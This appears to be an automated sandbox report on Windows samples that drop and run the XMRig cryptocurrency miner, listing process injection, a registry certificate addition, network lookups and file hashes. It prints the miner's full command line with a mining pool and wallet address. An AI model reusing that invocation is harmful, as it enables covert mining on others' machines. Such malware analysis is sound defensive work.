C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2472 wrote to memory of 2516 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2472 wrote to memory of 2516 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.160:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 160.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| NL | 23.62.61.75:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 75.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 17.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2516-16-0x0000023F0E6E0000-0x0000023F0E700000-memory.dmp
memory/2516-17-0x0000023F0E740000-0x0000023F0E760000-memory.dmp
memory/2516-18-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-20-0x0000023F0E760000-0x0000023F0E780000-memory.dmp
memory/2516-19-0x0000023F0E780000-0x0000023F0E7A0000-memory.dmp
memory/2516-21-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-22-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-23-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-25-0x0000023F0E760000-0x0000023F0E780000-memory.dmp
memory/2516-24-0x0000023F0E780000-0x0000023F0E7A0000-memory.dmp
memory/2516-26-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-27-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-28-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-29-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-30-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-31-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-32-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-33-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-34-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-35-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-36-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-37-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-38-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-39-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-40-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-41-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-42-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-43-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-44-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-45-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-46-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-47-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-48-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-49-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-50-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-51-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-52-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-53-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-54-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-55-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-56-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-57-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-58-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-59-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-60-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-61-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-62-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-63-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-64-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-65-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-66-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-67-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-68-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-69-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-70-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-71-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-72-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-73-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-74-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-75-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-76-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-77-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-78-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-79-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-80-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-81-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-82-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-83-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-84-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 15:51
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1785s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1284 wrote to memory of 3092 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1284 wrote to memory of 3092 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 52.111.227.11:443 | tcp | |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| NL | 23.62.61.75:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 75.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3092-16-0x000001F7910A0000-0x000001F7910C0000-memory.dmp
memory/3092-17-0x000001F792AA0000-0x000001F792AC0000-memory.dmp
memory/3092-18-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-20-0x000001F792AE0000-0x000001F792B00000-memory.dmp
memory/3092-19-0x000001F792AC0000-0x000001F792AE0000-memory.dmp
memory/3092-21-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-22-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-25-0x000001F792AE0000-0x000001F792B00000-memory.dmp
memory/3092-24-0x000001F792AC0000-0x000001F792AE0000-memory.dmp
memory/3092-23-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-26-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-27-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-28-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-29-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-30-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-31-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-32-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-33-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-34-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-35-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-36-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-37-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-38-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-39-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-40-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-41-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-42-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-43-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-44-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-45-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-46-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-47-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-48-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-49-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-50-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-51-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-52-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-53-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-54-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-55-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-56-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-57-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-58-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-59-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-60-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-61-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-62-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-63-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-64-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-65-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-66-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-67-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-68-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-69-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-70-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-71-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-72-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-73-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-74-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-75-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-76-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-77-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-78-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-79-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-80-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-81-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-82-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-83-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
memory/3092-84-0x00007FF70DFC0000-0x00007FF70EAC3000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 15:52
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
